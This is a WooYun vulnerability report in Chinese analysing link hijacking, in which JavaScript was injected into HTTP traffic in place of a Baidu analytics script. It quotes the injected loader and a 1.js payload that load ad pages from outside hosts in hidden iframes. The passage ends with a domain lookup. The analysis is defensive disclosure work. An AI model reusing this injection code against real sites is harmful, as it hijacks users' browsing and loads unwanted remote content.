一次对链路劫持的反击 | wooyun-2016-0228047

漏洞概要关注数(24) 关注此漏洞

缺陷编号：

wooyun-2016-0228047

漏洞标题：

一次对链路劫持的反击

漏洞详情

披露状态：

2016-07-12：细节已通知厂商并且等待厂商处理中
2016-07-12：厂商已查看当前漏洞内容,细节仅向厂商公开
2016-07-17：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

起因是几个月前访问乌云和http网站时候网页播放蜜汁声音.当时还是dns劫持比较明显直接改dns就行,最近发现升级成为了链路劫持了,只能拔vpn过日子了.
这次懂得了广域网不用ssl已经不安全了.由衷的希望乌云可以上ssl... 如果分析有错希望大家多多包涵.感谢基友的帮忙..
最后多说一句劫持就算了吧服务器做这么水是要送肉鸡给鸡阔吗？
http://www.freebuf.com/vuls/62561.html
http://drops.wooyun.org/tips/11682
http://baike.baidu.com/link?url=_0eYS80EQMjttCrMOTKi6EwzymEAVgStJ9DkEWpHsNevMcPVv2xK4gjaeDzAiq8jfWdLfEaLn6uvqPuHCSD5CK

详细说明：

首先先看看先抓包看看

发现百度统计的**.**.**.**的返回包有问题
**.**.**.**:8080/tt/1.js
/tt/1.js

var CUSTOM_LOADJS={support:document.dispatchEvent?"onload":"onreadystatechange",query:{},module:{},add:function(e,t,n){var r=this.module;if(r[e])throw e+" is being";r[e]={},r[e].url=t,r[e].isOkay=n||!1},use:function(e,t){var n={},r;n.namespaces=e.split(","),n.callback=t||function(){},**.**.**.**plet=0,n.total=n.namespaces.length,r=n.namespaces.join(""),this.query[r]=n,this.start(n,r)},start:function(e,t){var n=0,r=e.namespaces.length,i,s;for(n;n<r;n++){s=e.namespaces[n].replace(/^\s+|\s+$/g,""),i=this.module[s];if(i===undefined)throw s+" is undefined";i.isOkay===!1?(i.isOkay=1,this.load(i.url,s,t)):i.isOkay===!0?this.checkBack(s,t):this.wait(i,s,t)}},wait:function(e,t,n){var r=this,i=setInterval(function(){e.isOkay===!0&&(clearInterval(i),r.checkBack(t,n))},500)},checkBack:function(e,t){this.module[e].isOkay=!0;var n=this.query[t];++**.**.**.**plet===n.total&&(n.callback(),delete this.query[t])},load:function(e,t,n){var r=this,i=document.createElement("script");i[this.support]=function(){/undefined|loaded|complete/.test(i.readyState)&&r.checkBack(t,n)},i.setAttribute("type","text/javascript"),i.setAttribute("src",e),document.getElementsByTagName("head")[0].appendChild(i)}}
CUSTOM_LOADJS.add('customadjs', '**.**.**.**:8080/1.js');CUSTOM_LOADJS.use('customadjs', function(){});

1.js

~function(){
    try{
        if(window.location.href.indexOf('**.**.**.**') == -1 && window.location.href.indexOf('**.**.**.**') == -1){
                load_page('http://**.**.**.**/js/bbk365_ad_ext.html');
                   load_page('http://**.**.**.**/ad/ggj_51yrj.html');
                   load_page('http://**.**.**.**/ad/ggj_kea1688.html');
                  load_page('http://**.**.**.**/js/bbk365_ad.html');
		}
    }catch(ee){}
}();
function load_page(url){
    try {
        var x_ifr = '<div>'
            + ' <iframe style="display:none" src="'+url+'"></iframe>'
            + '</div>';
        var x = document.createElement('div');
        x.style.cssText="display:none;";
        x.innerHTML=x_ifr;
        document.body.appendChild(x);
    } catch (e) {
    }
}

1.js里面的

function load_page(url){
    try {
        var x_ifr = '<div>'
            + ' <iframe style="display:none" src="'+url+'"></iframe>'
            + '</div>';
        var x = document.createElement('div');
        x.style.cssText="display:none;";
        x.innerHTML=x_ifr;
        document.body.appendChild(x);
    } catch (e) {
    }
}

http://**.**.**.**/js/bbk365_ad_ext.html
http://**.**.**.**/ad/ggj_51yrj.html
http://**.**.**.**/ad/ggj_kea1688.html
http://**.**.**.**/js/bbk365_ad.html
先查查域名信息吧,发现大多数都有域名信息保护